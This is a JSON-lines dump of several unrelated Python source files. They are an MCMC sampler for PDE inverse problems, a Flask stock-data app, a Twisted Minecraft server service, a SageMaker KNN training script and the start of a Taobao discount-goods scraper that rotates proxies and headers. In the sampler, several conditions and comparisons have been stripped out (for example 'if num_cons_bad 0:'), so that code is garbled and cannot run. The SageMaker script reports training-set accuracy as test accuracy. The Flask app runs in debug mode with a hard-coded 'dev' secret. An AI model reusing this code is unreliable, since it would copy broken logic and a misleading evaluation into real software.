self.Psi_r=MultiVector(self.v, self.dim_LIS_g)\n MvDSmatMult(self.Theta_r,W_r,self.Psi_r)\n \n def project_COV(self,Theta_r):\n \"\"\"\n Algorithm 3: Posterior covariance re-projection for each LIS update.\n Input: Theta_r, Sigma_r, Theta_r1\n Output: Sigma_r1\n \"\"\"\n# Theta_r1r=self.Theta_r.T.dot(Theta_r)\n self.Theta_r1r=np.array([self.Theta_r.dot_v(self.model.prior.M_PETScMatrix*Theta_r[i]) for i in range(Theta_r.nvec())]).T\n# Sigma_r_=self.Sigma_r.copy()\n# Sigma_r_[np.diag_indices_from(Sigma_r_)]-=1\n# Sigma_r1=Theta_r1r.dot(Sigma_r_).dot(Theta_r1r.T)\n# Sigma_r1[np.diag_indices_from(Sigma_r1)]+=1\n# self.Sigma_r=Sigma_r1\n self.Sigma_r=self.Theta_r1r.dot(self.Sigma_r-np.eye(self.Sigma_r.shape[0])).dot(self.Theta_r1r.T) + np.eye(self.Theta_r1r.shape[0])\n# # need to re-project empirical mean estimate of (projected) parameter\n# self.emp_mean=Theta_r1r.dot(self.emp_mean)\n \n def MH_step(self,v_ref=None):\n \"\"\"\n A Metropolis-Hastings step to generate a (posterior) sample.\n Input: v, [loglik, gradlik]\n Output: v1, [loglik1, gradlik1], acpt (indicator)\n \"\"\"\n# if v_ref is None:\n# v_ref=np.zeros_like(self.v)\n# state=self.geom.x[STATE].copy()\n # Compute a candidate using either LI-prior or LI-Langevin\n # Compute the (log) acceptance probability\n noise = dl.Vector()\n self.model.prior.init_vector(noise,\"noise\")\n self.randomGen.normal(1., noise)\n # Random.normal(noise, 1., True)\n xi=self.model.generate_vector(PARAMETER)\n self.geom.whtprior.sample(noise, xi)\n v=self.model.generate_vector(PARAMETER); v_help=dl.Vector(v)\n self.A(self.v,v); self.B(xi,v_help)\n v.axpy(1.,v_help)\n log_acpt=0 # log of acceptance probability\n if self.proposal is 'LI_prior':\n loglik,_,_,_=self.geom.get_geom(v)\n elif self.proposal is 'LI_Langevin':\n self.G(self.gradlik,v_help)\n v.axpy(1.,v_help)\n loglik,gradlik,_,_=self.geom.get_geom(v,geom_ord=[0,1])\n Psi_r_v=self.Psi_r.dot_v(self.model.prior.M_PETScMatrix*self.v); Psi_r_v1=self.Psi_r.dot_v(self.model.prior.M_PETScMatrix*v)\n l2_norm2=lambda x: x.dot(x)\n dum0=.5*l2_norm2(Psi_r_v)+.5*l2_norm2((Psi_r_v1-self.D_Ar*Psi_r_v-self.D_Gr*(self.Psi_r.dot_v(self.gradlik)))/self.D_Br)\n dum1=.5*l2_norm2(Psi_r_v1)+.5*l2_norm2((Psi_r_v-self.D_Ar*Psi_r_v1-self.D_Gr*(self.Psi_r.dot_v(gradlik)))/self.D_Br)\n log_acpt+= dum0-dum1\n else:\n if self.parameters['print_level'] > 0:\n print('Wrong proposal!')\n raise\n # log of acceptance probability\n log_acpt+=-self.loglik+loglik\n if v_ref is not None:\n log_acpt+= (self.model.prior.M_PETScMatrix*v_ref).dot(self.v-v)\n # print('log-Metropolis ratio: %0.2f' % log_acpt)\n # accept/reject step\n if np.isfinite(log_acpt) and np.log(np.random.uniform())0]))\n \n def _init_h(self):\n \"\"\"\n find a reasonable initial step size\n \"\"\"\n h=np.array([.5,1.])\n _self=self\n _self.h=h;_self.form_operators()\n _,logr=self.MH_step()\n a=2.*(np.exp(logr)>0.5)-1.\n while a*logr>-a*np.log(2):\n h*=pow(2.,a)\n _self=self\n _self.h=h;_self.form_operators()\n _,logr=self.MH_step()\n return h\n \n def _dual_avg(self,iter,an):\n \"\"\"\n dual-averaging to adapt step size\n \"\"\"\n hn_adpt=self.h_adpt\n hn_adpt['An']=(1.-1./(iter+hn_adpt['n0']))*hn_adpt['An'] + (hn_adpt['a0']-an)/(iter+hn_adpt['n0'])\n logh=hn_adpt['mu'] - np.sqrt(iter)/hn_adpt['gamma']*hn_adpt['An']\n hn_adpt['loghn']=pow(iter,-hn_adpt['kappa'])*logh + (1.-pow(iter,-hn_adpt['kappa']))*hn_adpt['loghn']\n hn_adpt['h']=np.exp(logh)\n return hn_adpt\n \n def setup(self,num_samp=1000,num_burnin=100,prt_lvl=1,mpi_comm=dl.mpi_comm_world(),seed=2017,**kwargs):\n \"\"\"\n setup (MPI, storage, etc.) for sampling\n \"\"\"\n self.parameters={}\n self.parameters['number_of_samples']=num_samp\n self.parameters['number_of_burnins']=num_burnin\n self.parameters['print_level']=prt_lvl\n self.data = np.zeros((num_samp, 4))\n self.m = self.model.generate_vector(PARAMETER)\n self.m2 = self.model.generate_vector(PARAMETER)\n self.mpi_comm=mpi_comm # or default to be self.model.problem.model.mesh.mpi_comm()\n self.rank = dl.MPI.rank(self.mpi_comm)\n self.nproc = dl.MPI.size(self.mpi_comm)\n # set (common) random seed\n self.randomGen = Random(seed=1)\n # if self.nproc > 1:\n # Random.split(self.rank, self.nproc, 1000000, seed)\n # else:\n # Random.seed(seed)\n np.random.seed(seed)\n \n # allocate space to store results\n import os\n samp_fname='_samp_DILI_'+self.proposal+'_dim'+str(self.dim)+'_'+time.strftime(\"%Y-%m-%d-%H-%M-%S\")\n samp_fpath=os.path.join(os.getcwd(),'result')\n if not os.path.exists(samp_fpath):\n os.makedirs(samp_fpath)\n # self.samp=dl.HDF5File(dl.mpi_comm_world(),os.path.join(samp_fpath,samp_fname+\".h5\"),\"w\")\n self.logLik=np.zeros(num_samp+num_burnin)\n self.acpt=0.0 # final acceptance rate\n self.LIS_dims=[] # record the changes in the dimension of global LIS\n self.dFs=[] # record the history of Forstner distances\n self.times=np.zeros(num_samp+num_burnin) # record the history of time used for each sample\n \n # number of adaptations for step size\n if self.adpt_h:\n self.h_adpt['n_adpt']=kwargs.pop('adpt_steps',num_burnin)\n self.stepszs=np.zeros((self.h_adpt['n_adpt'],len(self.h)))\n\n def save_data(self, n):\n if n >= self.parameters['number_of_burnins']:\n if self.model.qoi is not None:\n q = self.model.qoi.eval(self.geom.x)\n else:\n q = 0\n save_id = n - self.parameters['number_of_burnins']\n self.data[save_id, 0] = q\n self.data[save_id, 1] = self.geom.cost\n m = self.geom.x[PARAMETER]\n\n if save_id == 0:\n self.m.axpy(1., m)\n mhelp = self.model.generate_vector(PARAMETER)\n self.model.prior.M.mult(self.m, mhelp)\n self.data[save_id, 2] = np.sqrt(self.m.inner(mhelp))\n self.m2[:] = m.get_local() ** 2\n mhelp = self.model.generate_vector(PARAMETER)\n self.model.prior.M.mult(self.m2, mhelp)\n self.data[save_id, 3] = np.sqrt(self.m2.inner(mhelp))\n else:\n mhelp = self.model.generate_vector(PARAMETER)\n mhelp.axpy(1., self.m)\n self.m.zero()\n self.m.axpy(np.double(save_id) / (save_id + 1), mhelp)\n self.m.axpy(1. / (save_id + 1), m)\n mhelp = self.model.generate_vector(PARAMETER)\n self.model.prior.M.mult(self.m, mhelp)\n self.data[save_id, 2] = np.sqrt(self.m.inner(mhelp))\n\n mhelp = self.model.generate_vector(PARAMETER)\n mhelp.axpy(1., self.m2)\n self.m2.zero()\n self.m2.axpy(np.double(save_id) / (save_id + 1), mhelp)\n mhelp[:] = m.get_local() ** 2\n self.m2.axpy(1. / (save_id + 1), mhelp)\n mhelp = self.model.generate_vector(PARAMETER)\n self.model.prior.M.mult(self.m2, mhelp)\n self.data[save_id, 3] = np.sqrt(self.m2.inner(mhelp))\n\n\n def adaptive_MCMC(self,num_retry_bad=0,**kwargs):\n \"\"\"\n Algorithm 4: Adaptive function space MCMC with operator-weighted proposals.\n Require: During the LIS construction, we retain local{Theta_m,Xi_m} to store the expected GNH evaluated from m samples;\n and the value of d_F between the most recent two updates of the expected GNH, for LIS convergence monitoring.\n Require: At step n, given the state v_n, LIS basis Theta_r, projected empirical posterior covariance Sigma_r,\n and operators {A, B, G} induced by {Psi_r, D_r, h}, one step of the algorithm is below. \n \"\"\"\n if self.parameters['print_level'] > 0:\n print('\\nRunning adaptive DILI MCMC now...\\n')\n\n # initialize some recording statistics\n accp=0.0 # online acceptance\n num_cons_bad=0 # number of consecutive bad proposals\n \n beginning=timeit.default_timer()\n for n in xrange(self.parameters['number_of_samples']+self.parameters['number_of_burnins']):\n\n if n==self.parameters['number_of_burnins']:\n # start the timer\n tic=timeit.default_timer()\n if self.parameters['print_level'] > 0:\n print('\\nBurn-in completed; recording samples now...\\n')\n\n # MH-step\n while True:\n try:\n acpt_idx,log_acpt=self.MH_step()\n except RuntimeError as e:\n print(e)\n if num_retry_bad==0:\n acpt_idx=False; log_acpt=-np.inf\n# self.model._init_states(src4init='map_solution') # reinitialize solution to MAP\n if self.parameters['print_level'] > 0:\n print('Bad proposal encountered! Passing... bias introduced.')\n break # reject bad proposal: bias introduced\n else:\n num_cons_bad+=1\n if num_cons_bad 0:\n print('Bad proposal encountered! Retrying...')\n continue # retry until a valid proposal is made\n else:\n acpt_idx=False; log_acpt=-np.inf\n# self.model._init_states(src4init='map_solution') # reinitialize solution to MAP\n num_cons_bad=0\n if self.parameters['print_level'] > 0:\n print(str(num_retry_bad)+' consecutive bad proposals encountered! Passing...')\n break # reject it and keep going\n else:\n num_cons_bad=0\n break\n \n accp+=acpt_idx\n\n # display acceptance at intervals\n if (n+1)%100==0:\n if self.parameters['print_level'] > 0:\n print('\\nAcceptance at %d iterations: %0.2f' % (n+1,accp/100))\n accp=0.0\n\n # save results\n self.save_data(n)\n self.logLik[n]=self.loglik\n if n>=self.parameters['number_of_burnins']:\n # v_f=vector2Function(self.v,self.model.problem.Vh[PARAMETER])\n # self.samp.write(v_f,'sample_{0}'.format(n-self.parameters['number_of_burnins']))\n self.acpt+=acpt_idx\n \n # adaptation of LIS\n update=False\n if (n+1)%self.n_lag==0 and self.update_LIS_m=self.threshold_LIS:\n # record the current LIS basis\n Theta_r_=MultiVector(self.Theta_r); Xi_r_=self.Xi_r.copy()\n # Update LIS\n if self.parameters['print_level'] > 0:\n print('\\nUpdating LIS...')\n self.update_LIS(**kwargs)\n if self.parameters['print_level'] > 0:\n print(self.Xi_m)\n print('Local LIS has %d dimensions; and new global LIS has %d dimensions.' % (self.dim_LIS_l,self.dim_LIS_g))\n self.LIS_dims.append(self.dim_LIS_g)\n # Project (posterior) COV\n self.project_COV(Theta_r_)\n # Update the LIS convergence diagnostic\n self.LISconvergence_diagnostic(Theta_r_,Xi_r_)\n if self.parameters['print_level'] > 0:\n print('Forstner distance between two consecutive LIS'' becomes %.2e.\\n' % self.d_F)\n update=True\n if self.d_F 0:\n print('\\nConvergence diagnostic has dropped below the threshold. Stop updating LIS.\\n')\n else:\n self.dFs.append(self.d_F)\n else:\n # Perform rank-1 update of the empirical covariance\n self.rk1update_empCOV()\n if (n+1)%self.n_b==0:\n update=True\n if update:\n # Update (low-rank) COV approximation\n self.update_COV()\n # Update the operators\n self.form_operators()\n if self.parameters['print_level'] > 0:\n print('Low-rank posterior covariance approximation updated!')\n \n # record the time\n self.times[n]=timeit.default_timer()-beginning\n \n # adapt step size h if needed\n if self.adpt_h:\n if n 0:\n print('New step size: {}; \\t New averaged step size: {}\\n'.format(self.h_adpt['h'],np.exp(self.h_adpt['loghn'])))\n if n==self.h_adpt['n_adpt']:\n self.h_adpt['h']=np.exp(self.h_adpt['loghn'])\n self.h=self.h_adpt['h']; self.form_operators()\n if self.parameters['print_level'] > 0:\n print('Adaptation completed; step size frozen at: {}\\n'.format(self.h_adpt['h']))\n\n # stop timer\n # self.samp.close()\n toc=timeit.default_timer()\n self.time=toc-tic\n self.acpt/=self.parameters['number_of_samples']\n if self.parameters['print_level'] > 0:\n print(\"\\nAfter %g seconds, %d samples have been collected with the final acceptance rate %0.2f \\n\"\n % (self.time,self.parameters['number_of_samples'],self.acpt))\n\n # # save samples to file\n # self.save_samp()\n \n def save_samp(self):\n \"\"\"\n Save results to file\n \"\"\"\n import os,pickle\n # create folder if not existing\n cwd=os.getcwd()\n self.savepath=os.path.join(cwd,'result')\n if not os.path.exists(self.savepath):\n os.makedirs(self.savepath)\n # name file\n ctime=time.strftime(\"%Y-%m-%d-%H-%M-%S\")\n self.filename='DILI_'+self.proposal+'_dim'+str(self.dim)+'_'+ctime\n # dump data\n f=open(os.path.join(self.savepath,self.filename+'.pckl'),'wb')\n res2save=[self.h,self.proposal,self.logLik,self.acpt,self.time,self.times,\n self.n_lag,self.n_max,self.n_b,self.threshold_LIS,self.update_LIS_m,self.LIS_dims,self.dFs,self.Xi_r]\n if self.adpt_h:\n res2save.append([self.stepszs,self.h_adpt])\n pickle.dump(res2save,f)\n f.close()\n # save global LIS\n# self.Theta_r.export(self.model.problem.Vh[PARAMETER],os.path.join(self.savepath,'gLIS_'+self.filename+'.pvd'))\n self.Theta_r.export(self.model.problem.Vh[PARAMETER],os.path.join(self.savepath,'gLIS_'+self.filename+'.xdmf'))","sub_path":"PDE_Models/hippylib/sampler/DILI_hippy.py","file_name":"DILI_hippy.py","file_ext":"py","file_size_in_byte":30112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"550624409","text":"from flask import Flask\r\nfrom flask import request\r\nfrom flask import render_template\r\nfrom flask import Response\r\nfrom flask_wtf import FlaskForm\r\nfrom wtforms import StringField, SubmitField,DateField,SelectField\r\nfrom wtforms.validators import DataRequired, Length\r\nfrom flask_bootstrap import Bootstrap\r\nfrom HW3demo import pred\r\nfrom stockdata import realtime,history\r\nimport time\r\n\r\napp = Flask(__name__)\r\napp.secret_key = 'dev'\r\nbootstrap = Bootstrap(app)\r\n\r\n\r\ndef add(x):\r\n return int(x)+10\r\n\r\n\r\nclass stockdataForm(FlaskForm):\r\n start = DateField('Start date ( Year-month-day xxxx-xx-xx )', format='%Y-%m-%d')\r\n end = DateField('End date ( Year-month-day xxxx-xx-xx )', format='%Y-%m-%d')\r\n company = SelectField('Company', choices=[\r\n ('aaba', 'Altaba'), \r\n ('aapl', 'Apple'),\r\n ('amd', 'AMD'),\r\n ('amzn', 'Amazon'),\r\n ('goog', 'Google'),\r\n ('intc', 'Intel'),\r\n ('nvda', 'Nvida'),\r\n ('qcom', 'Qualcomm'),\r\n ('tsla', 'Tesla'),\r\n ('xlnx', 'Xlinx')\r\n ]) #'value', 'view'\r\n submit = SubmitField()\r\n\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n return render_template('home.html')\r\n\r\n\r\n@app.route(\"/stockdata\", methods=['GET'])\r\ndef stockdata():\r\n form = stockdataForm()\r\n return render_template('stockdata.html',form=form)\r\n\r\n\r\n@app.route(\"/stockdata\", methods=['POST'])\r\ndef stockdata1():\r\n form = stockdataForm()\r\n start_date = request.form['start']\r\n end_date = request.form['end']\r\n company = request.form['company']\r\n price, volume, localtime = realtime(company)\r\n fig_dict, data = history(company, start_date, end_date)\r\n \r\n return render_template('stockdata.html',\r\n form=form, price=price, volume=volume, localtime=localtime,\r\n url=fig_dict, dynamic=time.time(), data=data)\r\n\r\n\r\n@app.route(\"/predict\", methods=['GET', 'POST'])\r\ndef predict():\r\n return render_template('predict.html')\r\n\r\n\r\n@app.route(\"/findsim\", methods=['GET'])\r\ndef findsim():\r\n form = stockdataForm()\r\n return render_template('findsimilar.html', form=form)\r\n\r\n\r\n@app.route(\"/findsim\", methods=['POST'])\r\ndef findsim1():\r\n form = stockdataForm()\r\n start_date = request.form['start']\r\n end_date = request.form['end']\r\n company = request.form['company']\r\n price, volume, localtime = realtime(company)\r\n fig_dict, data = history(company, start_date, end_date)\r\n \r\n return render_template('findsimilar.html',\r\n form=form, price=price, volume=volume, localtime=localtime,\r\n url=fig_dict, dynamic=time.time(), data=data)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=1, port=5500)\r\n","sub_path":"source code/webapi.py","file_name":"webapi.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"249052329","text":"from twisted.application.internet import TCPClient, TCPServer\nfrom twisted.application.service import Application, MultiService\nfrom twisted.application.strports import service as serviceForEndpoint\nfrom twisted.internet.protocol import Factory\nfrom twisted.python import log\n\nfrom bravo.amp import ConsoleRPCFactory\nfrom bravo.config import configuration, read_configuration\nfrom bravo.factories.beta import BravoFactory\nfrom bravo.factories.infini import InfiniNodeFactory\nfrom bravo.protocols.beta import BetaProxyProtocol\n\nclass BetaProxyFactory(Factory):\n protocol = BetaProxyProtocol\n\n def __init__(self, name):\n self.name = name\n self.port = configuration.getint(\"infiniproxy %s\" % name, \"port\")\n\ndef services_for_endpoints(endpoints, factory):\n l = []\n for endpoint in endpoints:\n server = serviceForEndpoint(endpoint, factory)\n # XXX hack for bravo.web:135, which wants this. :c\n server.args = [None, factory]\n server.setName(\"%s (%s)\" % (factory.name, endpoint))\n l.append(server)\n return l\n\nclass BravoService(MultiService):\n\n def __init__(self):\n MultiService.__init__(self)\n\n # Start up our AMP RPC.\n self.amp = TCPServer(25601, ConsoleRPCFactory(self))\n MultiService.addService(self, self.amp)\n self.factorylist = list()\n self.irc = False\n self.ircbots = list()\n self.configure_services(configuration)\n\n def addService(self, service):\n MultiService.addService(self, service)\n\n def removeService(self, service):\n MultiService.removeService(self, service)\n\n def configure_services(self, configuration):\n read_configuration()\n\n for section in configuration.sections():\n if section.startswith(\"world \"):\n # Bravo worlds. Grab a list of endpoints and load them.\n factory = BravoFactory(section[6:])\n interfaces = configuration.getlist(section, \"interfaces\")\n\n for service in services_for_endpoints(interfaces, factory):\n self.addService(service)\n\n self.factorylist.append(factory)\n elif section == \"web\":\n try:\n from bravo.web import bravo_site\n except ImportError:\n log.msg(\"Couldn't import web stuff!\")\n else:\n factory = bravo_site(self.namedServices)\n factory.name = \"web\"\n interfaces = configuration.getlist(\"web\", \"interfaces\")\n\n for service in services_for_endpoints(interfaces, factory):\n self.addService(service)\n elif section.startswith(\"irc \"):\n try:\n from bravo.irc import BravoIRC\n except ImportError:\n log.msg(\"Couldn't import IRC stuff!\")\n else:\n self.irc = True\n self.ircbots.append(section)\n elif section.startswith(\"infiniproxy \"):\n factory = BetaProxyFactory(section[12:])\n interfaces = configuration.getlist(section, \"interfaces\")\n\n for service in services_for_endpoints(interfaces, factory):\n self.addService(service)\n elif section.startswith(\"infininode \"):\n factory = InfiniNodeFactory(section[11:])\n interfaces = configuration.getlist(section, \"interfaces\")\n\n for service in services_for_endpoints(interfaces, factory):\n self.addService(service)\n if self.irc:\n for section in self.ircbots:\n factory = BravoIRC(self.factorylist, section[4:])\n client = TCPClient(factory.host, factory.port, factory)\n client.setName(factory.config)\n self.addService(client)\n\nservice = BravoService()\n\napplication = Application(\"Bravo\")\nservice.setServiceParent(application)\n","sub_path":"bravo/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"460509882","text":"from sklearn.neighbors import KNeighborsClassifier\nfrom os.path import join\nfrom io import BytesIO\nimport pandas as pd\nimport numpy as np\nimport argparse\nimport logging\nimport pickle\nimport time\nimport json\nimport sys\nimport os\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nlogger.addHandler(logging.StreamHandler(sys.stdout))\n\nif 'SAGEMAKER_METRICS_DIRECTORY' in os.environ:\n log_file_handler = logging.FileHandler(join(os.environ['SAGEMAKER_METRICS_DIRECTORY'], \"metrics.json\"))\n log_file_handler.setFormatter(\n \"{'time':'%(asctime)s', 'name': '%(name)s', \\\n 'level': '%(levelname)s', 'message': '%(message)s'}\"\n )\n logger.addHandler(log_file_handler)\n \n \ndef model_fn(model_dir):\n print('[-------------- INSIDE MODEL FN --------------]')\n print(f'MODEL DIR: {model_dir}')\n model = pickle.load(open(os.path.join(model_dir, 'model'), 'rb'))\n return model\n\n\ndef input_fn(request_body, request_content_type):\n print('[-------------- INSIDE INPUT FN --------------]')\n print(f'REQUEST BODY: {request_body}')\n print(f'REQUEST CONTENT TYPE: {request_content_type}')\n if request_content_type == 'application/x-npy':\n stream = BytesIO(request_body)\n return np.load(stream)\n else:\n raise ValueError('Content type must be application/x-npy')\n\n\ndef predict_fn(input_data, model):\n print('[-------------- INSIDE PREDICT FN --------------]')\n print(f'INPUT DATA: {input_data}')\n print(f'MODEL: {model}')\n X = input_data.reshape(1, -1)\n prediction = model.predict(X)\n return prediction\n\n\ndef output_fn(prediction, content_type):\n print('[-------------- INSIDE OUTPUT FN --------------]')\n print(f'PREDICTION: {prediction}')\n print(f'CONTENT TYPE: {content_type}')\n if content_type == 'application/x-npy':\n buffer = BytesIO()\n np.save(buffer, prediction)\n return buffer.getvalue()\n else:\n raise ValueError('Accept header must be application/x-npy')\n\n\ndef train():\n parser = argparse.ArgumentParser()\n parser.add_argument('--output-data-dir', type=str, default=os.environ.get('SM_OUTPUT_DATA_DIR'))\n parser.add_argument('--model-dir', type=str, default=os.environ.get('SM_MODEL_DIR'))\n parser.add_argument('--train', type=str, default=os.environ.get('SM_CHANNEL_TRAIN'))\n parser.add_argument('--test', type=str, default=os.environ.get('SM_CHANNEL_TEST'))\n # hyperparameters\n parser.add_argument('--nneighbors', type=int, default=5)\n args = parser.parse_args()\n \n # ------------------------- YOUR MODEL TRAINING LOGIC STARTS HERE -------------------------\n # Load data from the location specified by args.train (In this case, an S3 bucket)\n print(\"------- [STARTING TRAINING] -------\")\n train_df = pd.read_csv(os.path.join(args.train, 'train.csv'), names=['class', 'mass', 'width', 'height', 'color_score'])\n train_df.head()\n X_train = train_df[['mass', 'width', 'height', 'color_score']]\n y_train = train_df['class']\n knn = KNeighborsClassifier(n_neighbors=args.nneighbors)\n knn.fit(X_train, y_train)\n # Save the trained Model inside the Container\n pickle.dump(knn, open(os.path.join(args.model_dir, 'model'), 'wb'))\n print(\"------- [TRAINING COMPLETE!] -------\")\n \n print(\"------- [STARTING EVALUATION] -------\")\n test_df = pd.read_csv(os.path.join(args.test, 'test.csv'), names=['class', 'mass', 'width', 'height', 'color_score'])\n X_test = train_df[['mass', 'width', 'height', 'color_score']]\n y_test = train_df['class']\n acc = knn.score(X_test, y_test)\n print('Accuracy = {:.4f}%'.format(acc * 100))\n logger.info('Test Accuracy: {:.4f}%'.format(acc * 100))\n print(\"------- [EVALUATION DONE!] -------\")\n\nif __name__ == '__main__':\n train()","sub_path":"SageMaker/Training-Inference/5. BYOS Sklearn/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"513609621","text":"# coding:utf-8\n\n'''\n@author = super_fazai\n@File : taobao_tiantiantejia.py\n@Time : 2017/12/26 16:02\n@connect : superonesfazai@gmail.com\n'''\n\n\"\"\"\n淘宝天天特价板块抓取清洗入库\n\"\"\"\n\nimport sys\nsys.path.append('..')\n\nimport time\nfrom random import randint\nimport json\nimport requests\nimport re\nfrom pprint import pprint\nfrom decimal import Decimal\nfrom time import sleep\nimport datetime\nimport gc\n\nfrom settings import HEADERS\nfrom settings import PHANTOMJS_DRIVER_PATH, CHROME_DRIVER_PATH, IS_BACKGROUND_RUNNING\nfrom my_pipeline import SqlServerMyPageInfoSaveItemPipeline, SqlPools\nfrom selenium import webdriver\nimport selenium.webdriver.support.ui as ui\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport pytz\n\nfrom taobao_parse import TaoBaoLoginAndParse\n\n# phantomjs驱动地址\nEXECUTABLE_PATH = PHANTOMJS_DRIVER_PATH\n\nclass TaoBaoTianTianTeJia(object):\n def __init__(self):\n self.headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n # 'Accept-Encoding:': 'gzip',\n 'Accept-Language': 'zh-CN,zh;q=0.8',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive',\n 'Host': 'metrocity.taobao.com',\n 'User-Agent': HEADERS[randint(0, 34)] # 随机一个请求头\n }\n self.result_data = {}\n self.init_phantomjs()\n\n self.main_sort = {\n '901': '时尚女装',\n '902': '舒适内衣',\n '903': '包包配饰',\n '904': '男鞋女鞋',\n '905': '品质男装',\n '906': '母婴儿童',\n '907': '日用百货',\n '908': '美食特产',\n '909': '数码家电',\n '910': '美容护肤',\n '911': '运动户外',\n }\n\n def get_all_goods_list(self):\n '''\n 模拟构造得到天天特价的所有商品的list, 并且解析存入每个\n :return: sort_data 类型list\n '''\n # * 获取分类的name和extQuery的tagId的地址为 *(开始为在blockId=901开始)\n # https://metrocity.taobao.com/json/fantomasTags.htm?_input_charset=utf-8&appId=9&blockId=901\n sort_data = []\n for block_id in range(901, 914, 1):\n sort_url = 'https://metrocity.taobao.com/json/fantomasTags.htm?_input_charset=utf-8&appId=9&blockId=' + str(block_id)\n print(sort_url)\n sort_body = self.use_phantomjs_to_get_url_body(url=sort_url)\n # print(sort_body)\n\n if sort_body != '':\n tmp_sort_data = self.get_sort_data_list(body=sort_body)\n # print(tmp_sort_data)\n if str(block_id) in self.main_sort:\n sort_name = self.main_sort[str(block_id)]\n # print(sort_name)\n tmp = {\n block_id: sort_name,\n 'data': tmp_sort_data,\n }\n sort_data.append(tmp)\n sleep(.5)\n pprint(sort_data)\n\n try:\n self.driver.quit()\n except:\n pass\n gc.collect()\n\n return sort_data\n\n def deal_with_all_goods_id(self, sort_data):\n '''\n 获取每个详细分类的商品信息\n :param sort_data: 所有分类的商品信息(包括商品id跟特价开始时间跟结束时间)\n :return: None\n '''\n my_pipeline = SqlServerMyPageInfoSaveItemPipeline()\n # my_pipeline = SqlPools()\n index = 1\n if my_pipeline.is_connect_success:\n # 普通sql_server连接(超过3000无返回结果集)\n db_goods_id_list = [item[0] for item in list(my_pipeline.select_taobao_tiantian_tejia_all_goods_id())]\n print(db_goods_id_list)\n\n for item in sort_data:\n for key in item.keys():\n if isinstance(key, int): # 当key值类型为int时, 表示为详细分类的blockID的值\n tmp_data = item.get('data', [])\n for item_2 in tmp_data:\n # &extQuery=tagId%3A1010142 要post的数据, 此处直接用get模拟\n tmp_url = 'https://metrocity.taobao.com/json/fantomasItems.htm?appId=9&pageSize=1000&_input_charset=utf-8&blockId={0}&extQuery=tagId%3A{1}'.format(\n str(key), item_2.get('extQuery', '')[6:]\n )\n\n tmp_body = self.get_url_body(url=tmp_url)\n tejia_goods_list = self.get_tiantiantejia_goods_list(body=tmp_body)\n print(tejia_goods_list)\n\n for tmp_item in tejia_goods_list:\n if tmp_item.get('goods_id', '') in db_goods_id_list:\n print('该goods_id已经存在于数据库中, 此处跳过')\n pass\n\n else:\n if index % 50 == 0: # 每50次重连一次,避免单次长连无响应报错\n print('正在重置,并与数据库建立新连接中...')\n # try:\n # del my_pipeline\n # except:\n # pass\n # gc.collect()\n my_pipeline = SqlServerMyPageInfoSaveItemPipeline()\n # my_pipeline = SqlPools()\n print('与数据库的新连接成功建立...')\n\n if my_pipeline.is_connect_success:\n tmp_url = 'https://item.taobao.com/item.htm?id=' + str(tmp_item.get('goods_id', ''))\n taobao = TaoBaoLoginAndParse()\n goods_id = taobao.get_goods_id_from_url(tmp_url)\n taobao.get_goods_data(goods_id=goods_id)\n goods_data = taobao.deal_with_data(goods_id=goods_id)\n\n if goods_data != {}:\n goods_data['goods_id'] = tmp_item.get('goods_id', '')\n goods_data['goods_url'] = tmp_url\n goods_data['schedule'] = [{\n 'begin_time': tmp_item.get('start_time', ''),\n 'end_time': tmp_item.get('end_time', ''),\n }]\n goods_data['tejia_begin_time'], goods_data['tejia_end_time'] = self.get_tejia_begin_time_and_tejia_end_time(schedule=goods_data.get('schedule', [])[0])\n goods_data['block_id'] = str(key)\n goods_data['tag_id'] = item_2.get('extQuery', '')[6:]\n goods_data['father_sort'] = self.main_sort[str(key)]\n goods_data['child_sort'] = item_2.get('name', '')\n # print(goods_data)\n\n taobao.insert_into_taobao_tiantiantejia_table(data=goods_data, pipeline=my_pipeline)\n else:\n pass\n sleep(1.6)\n index += 1\n else:\n print('数据库连接失败!')\n pass\n else:\n pass\n\n else:\n print('数据库连接失败!')\n pass\n gc.collect()\n\n def get_url_body(self, url):\n '''\n 获取url的body\n :param url: 待抓取的地址url\n :return: str\n '''\n # 设置代理ip\n self.proxies = self.get_proxy_ip_from_ip_pool() # {'http': ['xx', 'yy', ...]}\n self.proxy = self.proxies['http'][randint(0, len(self.proxies) - 1)]\n\n tmp_proxies = {\n 'http': self.proxy,\n }\n # print('------>>>| 正在使用代理ip: {} 进行爬取... |<<<------'.format(self.proxy))\n\n # 更改Host\n tmp_headers = self.headers\n tmp_host = re.compile(r'https://(.*?)/.*').findall(url)[0]\n tmp_headers['Host'] = tmp_host\n try:\n response = requests.get(url, headers=tmp_headers, proxies=tmp_proxies, timeout=16)\n body = response.content.decode('utf-8')\n # print(body)\n body = re.compile(r'\\n').sub('', body)\n body = re.compile(r'\\t').sub('', body)\n body = re.compile(r' ').sub('', body)\n # print(body)\n\n body = re.compile(r'\\((.*)\\)').findall(body)[0]\n except:\n print('requests.get()请求超时....')\n print('data为空!')\n self.result_data = {} # 重置下,避免存入时影响下面爬取的赋值\n body = '{}'\n\n return body\n\n def get_tejia_begin_time_and_tejia_end_time(self, schedule):\n '''\n 返回拼团开始和结束时间\n :param miaosha_time:\n :return: tuple tejia_begin_time, tejia_end_time\n '''\n tejia_begin_time = schedule.get('begin_time')\n tejia_end_time = schedule.get('end_time')\n # 将字符串转换为datetime类型\n tejia_begin_time = datetime.datetime.strptime(tejia_begin_time, '%Y-%m-%d %H:%M:%S')\n tejia_end_time = datetime.datetime.strptime(tejia_end_time, '%Y-%m-%d %H:%M:%S')\n\n return tejia_begin_time, tejia_end_time\n\n def use_phantomjs_to_get_url_body(self, url):\n '''\n 